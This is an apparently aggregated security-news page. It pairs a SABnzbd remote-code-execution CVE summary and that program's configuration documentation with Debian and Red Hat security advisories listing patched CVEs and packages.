SABnzbd is an open source automated Usenet download tool. A design flaw was discovered in SABnzbd that could allow remote code execution. Manipulating the Parameters setting in the Notification Script functionality allows code execution with the privileges of the SABnzbd process. Exploiting the vulnerabilities requires access to the web interface. Remote exploitation is possible if users[exposed their setup to the internet or other untrusted networks without setting a username/password. By default SABnzbd is only accessible from `localhost`, with no authentication required for the web interface. This issue has been patched in commits `e3a722` and `422b4f` which have been included in the 4.0.2 release. Users are advised to upgrade. Users unable to upgrade should ensure that a username and password have been set if their instance is web accessible.

**Web server**

**SABnzbd Host**

The hostname that will be used to access SABnzbd.

*   127.0.0.1 or [::1] or localhost _(default)_ = Access from this computer only
*   empty = Finds and listens on your local (IPv4) IP address. Used for accessing from other computers. localhost will not work anymore so update your bookmarks.
*   0.0.0.0 = Listens on multiple interfaces (both local IP and localhost).
*   :: = Listen on both IPv4 and IPv6 addresses for local and network access.

For more information and option to overwrite this setting at startup see Command Line Parameters

**SABnzbd Port**

The internal webserver needs a port to listen on. The default port is 8080. Try another one if this address is already occupied by another program on your computer.  
NOTE macOS and Linux users: ports below 1025 may require SABnzbd launched as root.

**Web Interface**  
Advanced

SABnzbd comes with a few different skins (web interface styles). Pick one here and click on save. For the skin to become active, you have to shutdown SABnzbd and restart it again. Some skins support multiple color schemas.

**Language**

The program supports more languages.  
NOTE Help us translate SABnzbd in your language: add untranslated texts or improved existing translations.

**Enable HTTPS**

Enable the webserver to use HTTPS.  
For more information, see: HTTPS.  
NOTE Modern web browsers and other clients will not accept self-signed certificates and will give a warning and/or won't connect at all.

**HTTPS Port**  
Advanced

Port to be used for listening. Must be different from the normal HTTP port. If empty, the SABnzbd Port set above will only listen to HTTPS (this is the default setting).

**HTTPS Certificate**  
**HTTPS Key**  
**HTTPS Chain Certificates**  
Advanced

Files containing the HTTPS certificate, key and (optionally) chain Certificates.

**Security**

**SABnzbd Username**  
**SABnzbd Password**

You may want to limit access to the web interface to people knowing a username and password for the interface.

**External internet access**

Set the access level for connections from outside the local network.

By default, all IP addresses in a private network range, such as 192.168.0.0/16, 172.16.0.0/12, 10.0.0.0/8 and fd00::/8 are considered local. To define custom local network ranges, use the Special local_ranges setting.

*   **API:**
    *   No access = No outside access is allowed at all.
    *   Add NZB files = Only NZB's can be added via the API, nothing else.
    *   API (no config) = API is fully available (queue/history/add+remove NZB's/etc), except for methods that get or edit the configuration.
    *   Full API = All API methods are available, including editing the configuration.
*   **Full API & Web Interface:**
    *   Full Web Interface = The full API methods and the web interface are available. Users are always shown the login screen if username/password are set.
    *   Full Web interface - Only external access requires login = Only users outside the local network ranges are shown the login screen if username and password are set.

**API Key**

This is the _secret key_ that is needed in API calls.  
NOTE When you click the Change button, you'll need to tell your utilities the new key.

**NZB Key**

This is similar to the API Key, but only allows external applications to add NZB's.  
NOTE After adding NZB's, external applications do not have access to the queue to monitor the progress of the download.  
NOTE When you click the Change button, you'll need to tell your utilities the new key.

**Switches**

**Launch browser on startup**

Enable to auto-launch of the browser when SABnzbd is started.

**Check for new release**

If enabled, SABnzbd will check once a week whether a new release has been published.

**HTTPS certificate verification**  
Advanced

Verify certificates when connecting to indexers and RSS-sources using HTTPS. Some websites do not have proper certificates and some systems might not be configured correctly.

**SOCKS5 Proxy**  
Advanced

Connection information is entered as a URL, ie:

*   socks5://username:[email protected]:port or
*   socks5://hostname:port (no login)

NOTE The connection between the client and the server will use SSL if enabled. However, the connection between the proxy and the client will not. This means that the data transferred between the client and the server is hidden for anyone including the proxy, but the username and password for the proxy and the server address are unencrypted.

**Tuning**

**Maximum line speed**

Set how fast your internet connection is, in bytes/sec.  
NOTE If you have an ISP-speed of 10Mbit/sec, you should enter 1MB/s here.

**Percentage of line speed**  
Advanced

Which percentage of the line speed should SABnzbd use, e.g. 50. This value is used as the default value when SABnzbd starts.  
Setting a value of 0 disables any limit.

**Article Cache Limit**  
Advanced

How much memory (RAM) can be used for caching (reducing disk access). This value is set automatically when SABnzbd is started for the first time to 25% of the system's memory or 2G if you have more than 8GB of memory.  
You enter the amount in bytes but you can use factors like K, M, G etc. eg: 70M = 70 MB cache.

*   number = Maximum memory (in bytes)
*   0 = Disable Cache
*   -1 = Unlimited, up to maximum for your system (1 or 4GB).

See High speed downloading for more information.  
Article Cache is limited to 1G on 32bit systems and 4G on 64bit systems.

**Backup**

**Create backup**

Create a backup of the configuration file and databases in the Backup Folder. If the Backup Folder is not set, the backup will be created in the Completed Download Folder.  
You can also schedule a recurring backup in Scheduling.  
WARNING The backup contains all sensitive information like your passwords and API keys!  
NOTE The backup can only be created in this folder to prevent an attacker easy access to all your passwords and API-keys if they somehow manage to enter the configuration.

**Restore backup**

Restore a backup of the configuration file and databases.

CVE-2023-34237: SABnzbd - Wiki - General

RenderDoc through 1.26 allows an Integer Overflow with a resultant Buffer Overflow (issue 1 of 2).

CVE-2023-33863

Debian Linux Security Advisory 5419-1 - Two vulnerabilities were discovered in c-ares, an asynchronous name resolver library.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5419-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : c-aresCVE ID         : CVE-2023-31130 CVE-2023-32067Debian Bug     :Two vunerabilities were discovered in c-ares, an asynchronous nameresolver library:CVE-2023-31130    ares_inet_net_pton() is found to be vulnerable to a buffer underflow    for certain ipv6 addresses, in particular "0::00:00:00/2" was found    to cause an issue. c-ares only uses this function internally for    configuration purposes, however external usage for other purposes may    cause more severe issues.CVE-2023-32067    Target resolver may erroneously interprets a malformed UDP packet    with a lenght of 0 as a graceful shutdown of the connection, which    could cause a denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.17.1-1+deb11u3.We recommend that you upgrade your c-ares packages.For the detailed security status of c-ares please refer toits security tracker page at:https://security-tracker.debian.org/tracker/c-aresFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSAEaIACgkQO1LKKgqv2VRDGQf/dYEAeHJPGUsjOZqvhLvgCeKqgBuB0N3fz5Xpm/JmMmCoCihipy5xCCtAFnUifM+ERPjhkHPgerZEKPW9gSI/RXcbefRYu2sTfvaC0td3Gs1ZyGB4A3RrL6fCwEeMU3jYnfDZBfJpzmCBDx7HhYPx/IlKLWThEFvqvHZxTiKehelKdjV/VhOh9fvOqawPbrMt+DFeBabpN9Hbm1mqkDmeKLfeLzwGSXsSEKGpYPoz+6BCizFgppTHGIifWeBRdbcB0OA/qDD540ZLMRXCq53xmcU7qe8yDsdMuflX5ANIJ4iyG2pDYO3uwxcfCkDOofiTQdumVCGB6BZYVeucTc0dWg==4/KK-----END PGP SIGNATURE-----

Debian Security Advisory 5419-1

Red Hat Security Advisory 2023-3525-01 - Flask is a lightweight but extensible web development framework for Python based on the Werkzeug WSGI toolkit, and the Jinja 2 template engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: python-flask security update  
Advisory ID:       RHSA-2023:3525-01  
Product:           Red Hat Enterprise Linux Extras  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3525  
Issue date:        2023-06-07  
CVE Names:         CVE-2023-30861   
=====================================================================

1. Summary:

An update for python-flask is now available for Red Hat Enterprise Linux 7  
Extras.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux 7 Extras - noarch

3. Description:

Flask is a lightweight but extensible web development framework for Python  
based on the Werkzeug WSGI toolkit, and the Jinja 2 template engine.

Security Fix(es):

* flask: Possible disclosure of permanent session cookie due to missing  
Vary: Cookie header (CVE-2023-30861)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196643 - CVE-2023-30861 flask: Possible disclosure of permanent session cookie due to missing Vary: Cookie header

6. Package List:

Red Hat Enterprise Linux 7 Extras:

Source:  
python-flask-0.10.1-7.el7_9.src.rpm

noarch:  
python-flask-0.10.1-7.el7_9.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30861  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZIBw+tzjgjWX9erEAQjDww//S0Ay3p4qP1Fgqkw8/bD8nMc9QtBH6bRo  
McQKI/qOpSg7l4qqX4/Dlvos2r1CElc0LboTyzJ0J3shx+klVfUmXLrfYgSs7Jw3  
/ooZxJjutrdkvgez3norOuHQFqb418AUqmLSH2fDYtFNXlZyqSs08eo3xOsQf7N+  
FdPii6tMuiSUHdAj4yhBzp60ThBCm6CNyVFQfjZSKTNDDwuoB3zZIdWpIDz2lxtd  
yAjLCMKGw4kHLmGO+c4OXEhHK4vbUqk6+3xuJ4elzc90seEodI61c88To6DUe4L3  
BrZlfr3hugFefyl4wzRUYvSA9iJLmzdwbHUYpAQHZ90C2X63it66sEw3pdrflV80  
yj/0Gz8iVL/SHXAyeSj5AEIBmsegCCwZZvZnFufUQptZBioAAQbNCSPYH2WXLVLL  
XBfSlLTPYd6Xo6bIQ3xFAdqEEKiaQ+vykOaUkYYEcXdE06CYcApLm+B6nZdJrSTd  
WvCy1G82DMEXNtAwrhULCcVHJOfx8v9xWKiKT71ipYvzj1MR2vvdnIuxbEfYHoiv  
TbVgX08ixx+vyd+w0rHJmWIe96Gyzy1LzGa0xEzyNVJLv1yz50TAVaJq3A8bkKuD  
zk93nnlEA9WGuc11313bG2QwLRu/wJUeoRy7TzyMIkTB9Es+Um6PgdbEGna0hHZ5  
tmpg/ZT8uAU=  
=P970  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3525-01

Red Hat Security Advisory 2023-3491-01 - An update for redhat-release-virtualization-host and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Virtualization Host 4.4.z SP 1 security update  
Advisory ID:       RHSA-2023:3491-01  
Product:           Red Hat Virtualization  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3491  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-3564 CVE-2022-4378 CVE-2022-38023   
                   CVE-2022-41222 CVE-2023-0461 CVE-2023-1668   
=====================================================================

1. Summary:

An update for redhat-release-virtualization-host and  
redhat-virtualization-host is now available for Red Hat Virtualization 4  
for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64  
Red Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64

3. Description:

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* samba: RC4/HMAC-MD5 NetLogon Secure Channel is weak and should be avoided  
(CVE-2022-38023)

* kernel: mm/mremap.c use-after-free vulnerability (CVE-2022-41222)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/2974891

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2138818 - CVE-2022-41222 kernel: mm/mremap.c use-after-free vulnerability  
2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
2154362 - CVE-2022-38023 samba: RC4/HMAC-MD5 NetLogon Secure Channel is weak and should be avoided  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Virtualization 4 Hypervisor for RHEL 8:

Source:  
redhat-virtualization-host-4.5.3-202306050942_8.6.src.rpm

x86_64:  
redhat-virtualization-host-image-update-4.5.3-202306050942_8.6.x86_64.rpm

RHEL 8-based RHEV-H for RHEV 4 (build requirements):

Source:  
redhat-release-virtualization-host-4.5.3-7.el8ev.src.rpm

noarch:  
redhat-virtualization-host-image-update-placeholder-4.5.3-7.el8ev.noarch.rpm

x86_64:  
redhat-release-virtualization-host-4.5.3-7.el8ev.x86_64.rpm  
redhat-release-virtualization-host-content-4.5.3-7.el8ev.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-38023  
https://access.redhat.com/security/cve/CVE-2022-41222  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH90HtzjgjWX9erEAQighRAAiuq1CTwA4mbQuYcrigA9YiXuroKJrwMs  
YjzKehyc2I0li5xnc/PxStywzrjx7lUH1S9ugjxpkmjeQWDwt824zmEodDe0wHNQ  
ip0KjW8mQgs0drEUYythXKDhJrxQr3pjTh7a/pdOwlxsbIuaVhTmeUN7p1UGl22L  
hroyQTVVpi8mqo/o10H22Sxx2mNSCQrExn/7ec3BaRTu7LaUIUo9fTtBhNP5GEFx  
CjHJUNd79vhY9HdlSVLIwMNJAo+WEoMR1CV+2m82wgVzCopWXsDIoyehYKu936eJ  
L0MFokGxPLloG1bkHnbwAenR1d+fy3LEfCWfyNDcbNOGNuCQvF9jv4ZNmZYOwdkj  
6NVwOeMe546QhJL16gyIcKCxfhk56eNmTp+KxoSUW54RM+m+8VOSRn3josmi3NyA  
ZRihHAWSEj/fT+q1p7aqdHUF3woINb/mQQmvo1DY+v62wVqkigxbqoMPAgwHmoX/  
2AiSYQKEY1WGEpZNhHjR3gUL5GNPodXcwTICCH2V6DAgf2FK0OuSI9Q9njVN7IJM  
gOfbzceURZt1Id9hvkEg8+lIhVTB6NZSgyMwM02e1P5tg30ifjQAI1Bo6DDXtv2f  
c6m11ArXHbQXMNnx6Q+gqr2UJFHCIHi7Ce6m4oD1Cl4zM9PLcGpHS9xx3qoLo0h9  
09Z84nCl5w4=  
=zOgN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3491-01

Red Hat Security Advisory 2023-3490-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3490-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3490  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-0461 CVE-2023-2008 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.9.0) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* kernel: udmabuf: improper validation of array index leading to local  
privilege escalation (CVE-2023-2008)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2186862 - CVE-2023-2008 kernel: udmabuf: improper validation of array index leading to local privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kpatch-patch-5_14_0-70_30_1-1-6.el9_0.src.rpm  
kpatch-patch-5_14_0-70_36_1-1-5.el9_0.src.rpm  
kpatch-patch-5_14_0-70_43_1-1-4.el9_0.src.rpm  
kpatch-patch-5_14_0-70_49_1-1-3.el9_0.src.rpm  
kpatch-patch-5_14_0-70_50_2-1-2.el9_0.src.rpm  
kpatch-patch-5_14_0-70_53_1-1-1.el9_0.src.rpm

ppc64le:  
kpatch-patch-5_14_0-70_30_1-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-debuginfo-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-debugsource-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-debuginfo-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-debugsource-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-debuginfo-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-debugsource-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-debuginfo-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-debugsource-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-debuginfo-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-debugsource-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-debuginfo-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-debugsource-1-1.el9_0.ppc64le.rpm

x86_64:  
kpatch-patch-5_14_0-70_30_1-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-debuginfo-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-debugsource-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-debuginfo-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-debugsource-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-debuginfo-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-debugsource-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-debuginfo-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-debugsource-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-debuginfo-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-debugsource-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-debuginfo-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-debugsource-1-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-2008  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH90BdzjgjWX9erEAQgjZg/8DxqCbesJneHmcvrIpd6OD0CdufF6Ieyv  
Mg+SVpUVFZXaaj89PAoQdSCSt9cpUNvVGOdXX/yAkkOnArdq2NvyabMyq790kcWa  
N/5k7g/Tj/uV5maR5jlONZ54uk72RKnIzllgAlJlySX3Hm41dRCrrPKO16c3ev7B  
LPlQi33dvMVDGXHpNQDQlfY5zIItjQgok4csQSnOR4fKoDKwqzzXrSJwoWXZZp//  
WFJWCEPDg3qLTWqbC7bF5FTk1KG9i6YjTW+G8z3KKE9SYzxH2HBT00fnNKvE+mTg  
2LEQ4w4tGrcP6t7gQMKdqUtwXNTCr2dqiAk0Ep3HtTfNhwSctlgZuJLTtYgI8SEM  
qIpXmYXScF0sSLIsA7jGoGplIcWKAnHCFS6MmbDtNYltD7+Usv7fXxc0hItYSAx2  
vncQdq0RWG5mE46iH6cRO4VzW1G6U/+qxsebyhnj/mZ4pjMmTcmDoosqtwYWTDF5  
HFS5yy+km6Czlwo+gYZRnVtwTa4JEYLFtukt+6xUvqIniRYHEeg/UHa69wHfsfAF  
nNGswPL4VzA2swfnzEwEnlkVx6bLaLOCVlQsWxBsVQR97jY7DVL0IH+abGFVIsga  
VYMPJmSJDNfGijkm6OI4eIZXyDOMkLcf+O9+N+HOo/E7DKNtwf3pFrQGew2/TSiS  
8BrtfTkVQmI=  
=tuxU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3490-01

Red Hat Security Advisory 2023-3517-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3517-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3517  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-42896   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
kpatch-patch-4_18_0-305_71_1-1-5.el8_4.src.rpm  
kpatch-patch-4_18_0-305_72_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_76_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_82_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_86_2-1-1.el8_4.src.rpm  
kpatch-patch-4_18_0-305_88_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_71_1-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-debugsource-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_71_1-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-debugsource-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH90AdzjgjWX9erEAQjahQ/+Mq7WTw3u1UL+Wh0AJgWz7hb5T7WDbj6S  
msRTXxsRQ8qrQpr7JgLAt25uGC9cRydd/oNPbnsIAQi5toLq5c9LEcOreBMalyep  
JYyHdXpeLmILPpdFyHnRBQ4QAwhi+rwSnmtk6I4wxQtCY/DQu1AFcJXzJe7aXBiN  
